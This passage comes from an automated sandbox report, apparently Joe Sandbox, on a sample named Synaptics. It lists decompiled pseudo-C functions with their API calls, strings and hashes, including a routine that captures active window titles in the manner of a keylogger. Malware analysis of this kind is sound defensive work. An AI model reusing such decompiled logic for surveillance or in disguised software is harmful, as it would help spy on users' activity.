					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x49ebac; // 0x22b0da8
					E0042C30C(_t34,  &_v24);
					_push(_t69);
					_push(0x44e12a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E0044DD30(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x44e131);
							_t40 =  *0x49ebac; // 0x22b0da8
							return E0042C304(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x49ebac; // 0x22b0da8
					E0042C30C(_t42,  &_v8);
					_push(_t69);
					_push(0x44e0ff);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E0044DED8( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x44e106);
					_t48 =  *0x49ebac; // 0x22b0da8
					return E0042C304(_t48);
				}
				L14:
			}


















                                                                                                                                                                                          0x0044e02d
                                                                                                                                                                                          0x0044e02f
                                                                                                                                                                                          0x0044e033
                                                                                                                                                                                          0x0044e035
                                                                                                                                                                                          0x0044e03f
                                                                                                                                                                                          0x0044e048
                                                                                                                                                                                          0x0044e147
                                                                                                                                                                                          0x0044e04e
                                                                                                                                                                                          0x0044e058
                                                                                                                                                                                          0x0044e05a
                                                                                                                                                                                          0x0044e05a
                                                                                                                                                                                          0x0044e06a
                                                                                                                                                                                          0x0044e06c
                                                                                                                                                                                          0x0044e06c
                                                                                                                                                                                          0x0044e076
                                                                                                                                                                                          0x0044e078
                                                                                                                                                                                          0x0044e078
                                                                                                                                                                                          0x0044e084
                                                                                                                                                                                          0x0044e08a
                                                                                                                                                                                          0x0044e08f
                                                                                                                                                                                          0x0044e096
                                                                                                                                                                                          0x0044e097
                                                                                                                                                                                          0x0044e09c
                                                                                                                                                                                          0x0044e09f
                                                                                                                                                                                          0x0044e0a2
                                                                                                                                                                                          0x0044e0a2
                                                                                                                                                                                          0x0044e0b4
                                                                                                                                                                                          0x0044e0bb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044e10a
                                                                                                                                                                                          0x0044e114
                                                                                                                                                                                          0x0044e117
                                                                                                                                                                                          0x0044e11a
                                                                                                                                                                                          0x0044e11f
                                                                                                                                                                                          0x0044e129
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044e10a
                                                                                                                                                                                          0x0044e0c0
                                                                                                                                                                                          0x0044e0c5
                                                                                                                                                                                          0x0044e0cc
                                                                                                                                                                                          0x0044e0cd
                                                                                                                                                                                          0x0044e0d2
                                                                                                                                                                                          0x0044e0d5
                                                                                                                                                                                          0x0044e0e4
                                                                                                                                                                                          0x0044e0e9
                                                                                                                                                                                          0x0044e0ec
                                                                                                                                                                                          0x0044e0ef
                                                                                                                                                                                          0x0044e0f4
                                                                                                                                                                                          0x0044e0fe
                                                                                                                                                                                          0x0044e0fe
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetKeyState.USER32(00000010), ref: 0044E050
                                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 0044E062
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: State
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1649606143-3916222277
                                                                                                                                                                                          • Opcode ID: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                                                                                                                                                          • Instruction ID: dd991a499b8bdb83682dc26b7e7e078d12a516ef0c40e0bf5f2210f7bad781b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                                                                                                                                                          • Instruction Fuzzy Hash: D231F731A04218AFEB11DFA6E84179EB7F5FB48314F50C4BBEC00A6291E77C5A00D668
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004354E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                          			E004354E8(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _t33;
				long _t46;
				CHAR* _t48;
				void* _t55;
				intOrPtr _t67;
				void* _t74;
				char _t76;
				void* _t79;

				_t74 = __edi;
				_t78 = _t79;
				_push(__ebx);
				_push(__esi);
				_v32 = 0;
				_v8 = 0;
				_v12 = 0;
				_t76 = __edx;
				_t55 = __eax;
				_push(_t79);
				_push(0x4355e0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79 + 0xffffffe4;
				_t81 = __edx;
				if(__edx == 0) {
					E0040D200(0x435088, 1);
					E00404378();
				}
				_v28 = _t76;
				_v24 = 0xb;
				E00435234(_t55, _t55,  &_v32, 0, _t74, _t76);
				_v20 = _v32;
				_v16 = 0xb;
				E0040A664("IE(AL(\"%s\",4),\"AL(\\\"%0:s\\\",3)\",\"JK(\\\"%1:s\\\",\\\"%0:s\\\")\")", 1,  &_v28,  &_v8);
				_t33 = E00435B78(_t55, _t74, _t78, _t81);
				_t82 = _t33;
				if(_t33 != 0) {
					E00435234(_t55, _t55,  &_v12, 0, _t74, _t76);
					if(E00435AD0(_t55, _t55, _v8, 1, _t76, _t82, 0) != 0 && _v12 != 0) {
						 *((char*)(_t55 + 0x10)) = 1;
						E00404A14(_t55 + 0x14, _v8);
						_t46 = E00404E80(_v8);
						_t48 = E00404E80(_v12);
						WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x1c)))) + 0xc))(), _t48, 0x102, _t46);
					}
				}
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x4355e7);
				E004049C0( &_v32);
				return E004049E4( &_v12, 2);
			}


















                                                                                                                                                                                          0x004354e8
                                                                                                                                                                                          0x004354e9
                                                                                                                                                                                          0x004354ee
                                                                                                                                                                                          0x004354ef
                                                                                                                                                                                          0x004354f2
                                                                                                                                                                                          0x004354f5
                                                                                                                                                                                          0x004354f8
                                                                                                                                                                                          0x004354fb
                                                                                                                                                                                          0x004354fd
                                                                                                                                                                                          0x00435501
                                                                                                                                                                                          0x00435502
                                                                                                                                                                                          0x00435507
                                                                                                                                                                                          0x0043550a
                                                                                                                                                                                          0x0043550d
                                                                                                                                                                                          0x0043550f
                                                                                                                                                                                          0x0043551d
                                                                                                                                                                                          0x00435522
                                                                                                                                                                                          0x00435522
                                                                                                                                                                                          0x0043552b
                                                                                                                                                                                          0x0043552e
                                                                                                                                                                                          0x00435539
                                                                                                                                                                                          0x00435541
                                                                                                                                                                                          0x00435544
                                                                                                                                                                                          0x00435555
                                                                                                                                                                                          0x0043555c
                                                                                                                                                                                          0x00435561
                                                                                                                                                                                          0x00435563
                                                                                                                                                                                          0x0043556c
                                                                                                                                                                                          0x00435581
                                                                                                                                                                                          0x00435589
                                                                                                                                                                                          0x00435593
                                                                                                                                                                                          0x0043559b
                                                                                                                                                                                          0x004355a9
                                                                                                                                                                                          0x004355b8
                                                                                                                                                                                          0x004355b8
                                                                                                                                                                                          0x00435581
                                                                                                                                                                                          0x004355bf
                                                                                                                                                                                          0x004355c2
                                                                                                                                                                                          0x004355c5
                                                                                                                                                                                          0x004355cd
                                                                                                                                                                                          0x004355df

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")"), xrefs: 00435550
                                                                                                                                                                                          • hI, xrefs: 00435511
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Help
                                                                                                                                                                                          • String ID: IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")$hI
                                                                                                                                                                                          • API String ID: 2830496658-455175267
                                                                                                                                                                                          • Opcode ID: e19117a1c590cfc50de19ac79ffa105df9ec7cf505658389bf4227d76567ce00
                                                                                                                                                                                          • Instruction ID: ee1a8833f3819ee9826a6e87181a8fb7dc7e8b52fcd89467c6c2dda304d0cd71
                                                                                                                                                                                          • Opcode Fuzzy Hash: e19117a1c590cfc50de19ac79ffa105df9ec7cf505658389bf4227d76567ce00
                                                                                                                                                                                          • Instruction Fuzzy Hash: BC3166B0A006049BDB04EFA5D885A9FB7B5AF4C304F51547EF900A7392D778AE05CB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045AE50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81threadwindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E0045AE50(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				intOrPtr _t36;
				long _t41;
				intOrPtr _t52;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __esi;
				_t71 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffff0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t74);
				_push(0x45af60);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t56 = E0045ADD8(_v8);
				if( *((char*)(_v8 + 0x88)) != 0) {
					_t52 = _v8;
					_t79 =  *((intOrPtr*)(_t52 + 0x48));
					if( *((intOrPtr*)(_t52 + 0x48)) == 0) {
						E0045B3A8(_v8);
					}
				}
				E00458DF8(_t56,  &_v20);
				E004380E0(_v20, 0,  &_v16, _t79);
				_t36 =  *0x49ebb8; // 0x22b1714
				E0045B010(_t36, _v16, _t79);
				_v9 = 1;
				_push(_t74);
				_push(0x45af07);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *((short*)(_v8 + 0x102)) != 0) {
					_t56 = _v8;
					 *((intOrPtr*)(_v8 + 0x100))();
				}
				if(_v9 != 0) {
					E0045AD74();
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_t41 = GetCurrentThreadId();
				_t67 =  *0x49de40; // 0x49e034
				if(_t41 ==  *_t67 && E004214B8(0, _t56, _t71, _t72) != 0) {
					_v9 = 0;
				}
				if(_v9 != 0) {
					WaitMessage();
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E0045AF67);
				return E004049E4( &_v20, 2);
			}
















                                                                                                                                                                                          0x0045ae50
                                                                                                                                                                                          0x0045ae50
                                                                                                                                                                                          0x0045ae51
                                                                                                                                                                                          0x0045ae53
                                                                                                                                                                                          0x0045ae56
                                                                                                                                                                                          0x0045ae57
                                                                                                                                                                                          0x0045ae58
                                                                                                                                                                                          0x0045ae5b
                                                                                                                                                                                          0x0045ae5e
                                                                                                                                                                                          0x0045ae61
                                                                                                                                                                                          0x0045ae66
                                                                                                                                                                                          0x0045ae67
                                                                                                                                                                                          0x0045ae6c
                                                                                                                                                                                          0x0045ae6f
                                                                                                                                                                                          0x0045ae7a
                                                                                                                                                                                          0x0045ae86
                                                                                                                                                                                          0x0045ae88
                                                                                                                                                                                          0x0045ae8b
                                                                                                                                                                                          0x0045ae8f
                                                                                                                                                                                          0x0045ae94
                                                                                                                                                                                          0x0045ae94
                                                                                                                                                                                          0x0045ae8f
                                                                                                                                                                                          0x0045ae9e
                                                                                                                                                                                          0x0045aea9
                                                                                                                                                                                          0x0045aeb1
                                                                                                                                                                                          0x0045aeb6
                                                                                                                                                                                          0x0045aebb
                                                                                                                                                                                          0x0045aec1
                                                                                                                                                                                          0x0045aec2
                                                                                                                                                                                          0x0045aec7
                                                                                                                                                                                          0x0045aeca
                                                                                                                                                                                          0x0045aed8
                                                                                                                                                                                          0x0045aedd
                                                                                                                                                                                          0x0045aee9
                                                                                                                                                                                          0x0045aee9
                                                                                                                                                                                          0x0045aef3
                                                                                                                                                                                          0x0045aef8
                                                                                                                                                                                          0x0045aef8
                                                                                                                                                                                          0x0045aeff
                                                                                                                                                                                          0x0045af02
                                                                                                                                                                                          0x0045af1c
                                                                                                                                                                                          0x0045af21
                                                                                                                                                                                          0x0045af29
                                                                                                                                                                                          0x0045af36
                                                                                                                                                                                          0x0045af36
                                                                                                                                                                                          0x0045af3e
                                                                                                                                                                                          0x0045af40
                                                                                                                                                                                          0x0045af40
                                                                                                                                                                                          0x0045af47
                                                                                                                                                                                          0x0045af4a
                                                                                                                                                                                          0x0045af4d
                                                                                                                                                                                          0x0045af5f

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0045ADD8: GetCursorPos.USER32 ref: 0045ADE1
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0045AF1C
                                                                                                                                                                                          • WaitMessage.USER32(00000000,0045AF60,?,?,?,0049ABD1), ref: 0045AF40
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentCursorMessageThreadWait
                                                                                                                                                                                          • String ID: 4I
                                                                                                                                                                                          • API String ID: 535285469-2364942553
                                                                                                                                                                                          • Opcode ID: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                                                                                                                                                          • Instruction ID: 3d320c2a842818ba80bdb21166925b08477e9e3b0af4457c4c140f173818ef6e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                                                                                                                                                          • Instruction Fuzzy Hash: F431D670A04208EFDB01DF65C846BAEB7F5EB05305F6145BAEC00A7392D7796E58C71A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E0040B620(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x40b6fe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E004049C0(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00404A58( &_v8, 0x40b720);
				} else {
					E00404A58( &_v8, 0x40b714);
				}
				_t32 = E00404E80(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E00404C30(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E00404EE0( *_t49, E00404C80( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E0040B705);
				return E004049C0( &_v8);
			}













                                                                                                                                                                                          0x0040b62d
                                                                                                                                                                                          0x0040b630
                                                                                                                                                                                          0x0040b632
                                                                                                                                                                                          0x0040b636
                                                                                                                                                                                          0x0040b637
                                                                                                                                                                                          0x0040b63c
                                                                                                                                                                                          0x0040b63f
                                                                                                                                                                                          0x0040b644
                                                                                                                                                                                          0x0040b650
                                                                                                                                                                                          0x0040b65b
                                                                                                                                                                                          0x0040b666
                                                                                                                                                                                          0x0040b66d
                                                                                                                                                                                          0x0040b686
                                                                                                                                                                                          0x0040b66f
                                                                                                                                                                                          0x0040b677
                                                                                                                                                                                          0x0040b677
                                                                                                                                                                                          0x0040b69a
                                                                                                                                                                                          0x0040b6b3
                                                                                                                                                                                          0x0040b6c2
                                                                                                                                                                                          0x0040b6c8
                                                                                                                                                                                          0x0040b6e3
                                                                                                                                                                                          0x0040b6e3
                                                                                                                                                                                          0x0040b6c8
                                                                                                                                                                                          0x0040b6ea
                                                                                                                                                                                          0x0040b6ed
                                                                                                                                                                                          0x0040b6f0
                                                                                                                                                                                          0x0040b6fd

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040B6FE), ref: 0040B6A6
                                                                                                                                                                                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040B6FE), ref: 0040B6AC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DateFormatLocaleThread
                                                                                                                                                                                          • String ID: yyyy
                                                                                                                                                                                          • API String ID: 3303714858-3145165042
                                                                                                                                                                                          • Opcode ID: 93818e334175762c92e35b25594c77656c2cc32511170523c903bb96775f57c2
                                                                                                                                                                                          • Instruction ID: 9bb3f367f0bbc217274b1ad28ba4a7515005ed0bbfdc0499212bfc9343ce28fe
                                                                                                                                                                                          • Opcode Fuzzy Hash: 93818e334175762c92e35b25594c77656c2cc32511170523c903bb96775f57c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: E42132B46041089BDB01EBA5C942AAE73A8EF48300F51447BF904F73D1D7789E04C7AE
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042A3E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                                                                          			E0042A3E8(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E00403BBC(1);
				_push(_t77);
				_push(0x42a46f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x418ef8; // 0x418f44
				 *((intOrPtr*)(_v12 + 0x6c)) = E00403D9C(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x49e8b0);
				L00406FE0();
				_push(_t77);
				_push(0x42a4cf);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E00428E70( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E00428E6C(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x42a4d6);
				_push(0x49e8b0);
				L004071A0();
				return 0;
			}












                                                                                                                                                                                          0x0042a3e9
                                                                                                                                                                                          0x0042a3eb
                                                                                                                                                                                          0x0042a3f5
                                                                                                                                                                                          0x0042a404
                                                                                                                                                                                          0x0042a409
                                                                                                                                                                                          0x0042a40a
                                                                                                                                                                                          0x0042a40f
                                                                                                                                                                                          0x0042a412
                                                                                                                                                                                          0x0042a418
                                                                                                                                                                                          0x0042a41e
                                                                                                                                                                                          0x0042a431
                                                                                                                                                                                          0x0042a431
                                                                                                                                                                                          0x0042a439
                                                                                                                                                                                          0x0042a443
                                                                                                                                                                                          0x0042a44e
                                                                                                                                                                                          0x0042a44e
                                                                                                                                                                                          0x0042a454
                                                                                                                                                                                          0x0042a462
                                                                                                                                                                                          0x0042a467
                                                                                                                                                                                          0x0042a46a
                                                                                                                                                                                          0x0042a486
                                                                                                                                                                                          0x0042a48b
                                                                                                                                                                                          0x0042a492
                                                                                                                                                                                          0x0042a493
                                                                                                                                                                                          0x0042a498
                                                                                                                                                                                          0x0042a49b
                                                                                                                                                                                          0x0042a4a4
                                                                                                                                                                                          0x0042a4af
                                                                                                                                                                                          0x0042a4b2
                                                                                                                                                                                          0x0042a4b9
                                                                                                                                                                                          0x0042a4bc
                                                                                                                                                                                          0x0042a4bf
                                                                                                                                                                                          0x0042a4c4
                                                                                                                                                                                          0x0042a4c9
                                                                                                                                                                                          0x0042a4ce

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049E8B0), ref: 0042A48B
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0049E8B0,0042A4D6,0049E8B0), ref: 0042A4C9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                          • String ID: P>B
                                                                                                                                                                                          • API String ID: 3168844106-1256901731
                                                                                                                                                                                          • Opcode ID: ca0b5ea70abbbc64981b48c8f213be05788fe1696cd43ae5739105b4e8816b91
                                                                                                                                                                                          • Instruction ID: 63024a2a2f57267be46c6b4524dac06f3360d3f79ec1ca4db72fa5e9cc5c2d4b
                                                                                                                                                                                          • Opcode Fuzzy Hash: ca0b5ea70abbbc64981b48c8f213be05788fe1696cd43ae5739105b4e8816b91
                                                                                                                                                                                          • Instruction Fuzzy Hash: 77218E74B04314EFD701DF69D88188DBBF5FB48720B5281AAE844A7791D778EE90CA98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004769AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                          			E004769AC(void* __ebx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				int _t28;
				intOrPtr _t32;
				void* _t37;
				intOrPtr* _t45;
				struct HWND__* _t48;
				intOrPtr _t55;
				intOrPtr _t67;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t67);
				_push(0x476a7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67;
				_t48 =  *(__edx + 4);
				if(_t48 > 0) {
					E0040500C( &_v8, GetWindowTextLengthA(_t48));
					_t28 = E00404C80(_v8) + 1;
					GetWindowTextA(_t48, E00404E80(_v8), _t28);
					_t32 =  *0x49ec6c; // 0x0
					E00408FF8(_t32,  &_v12);
					_push(_v12);
					E00408FF8(_v8,  &_v16);
					_pop(_t37);
					E00404DCC(_t37, _v16);
					if(_t28 != 0) {
						E00408FF8(_v8,  &_v20);
						if(_v20 != 0) {
							E00404A14(0x49ec6c, _v8);
							E00404CCC( &_v24, _v8, "Active -> ");
							_t45 =  *0x49ec44; // 0x22b4adc
							 *0x49ec48 =  *((intOrPtr*)( *_t45 + 0x38))();
						}
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(0x476a82);
				return E004049E4( &_v24, 5);
			}















                                                                                                                                                                                          0x004769b1
                                                                                                                                                                                          0x004769b2
                                                                                                                                                                                          0x004769b3
                                                                                                                                                                                          0x004769b4
                                                                                                                                                                                          0x004769b5
                                                                                                                                                                                          0x004769b9
                                                                                                                                                                                          0x004769ba
                                                                                                                                                                                          0x004769bf
                                                                                                                                                                                          0x004769c2
                                                                                                                                                                                          0x004769c5
                                                                                                                                                                                          0x004769ca
                                                                                                                                                                                          0x004769db
                                                                                                                                                                                          0x004769e8
                                                                                                                                                                                          0x004769f4
                                                                                                                                                                                          0x004769fc
                                                                                                                                                                                          0x00476a01
                                                                                                                                                                                          0x00476a09
                                                                                                                                                                                          0x00476a10
                                                                                                                                                                                          0x00476a18
                                                                                                                                                                                          0x00476a19
                                                                                                                                                                                          0x00476a1e
                                                                                                                                                                                          0x00476a26
                                                                                                                                                                                          0x00476a2f
                                                                                                                                                                                          0x00476a39
                                                                                                                                                                                          0x00476a49
                                                                                                                                                                                          0x00476a51
                                                                                                                                                                                          0x00476a5b
                                                                                                                                                                                          0x00476a5b
                                                                                                                                                                                          0x00476a2f
                                                                                                                                                                                          0x00476a1e
                                                                                                                                                                                          0x00476a62
                                                                                                                                                                                          0x00476a65
                                                                                                                                                                                          0x00476a68
                                                                                                                                                                                          0x00476a7a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowTextLengthA.USER32(?), ref: 004769D1
                                                                                                                                                                                          • GetWindowTextA.USER32 ref: 004769F4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
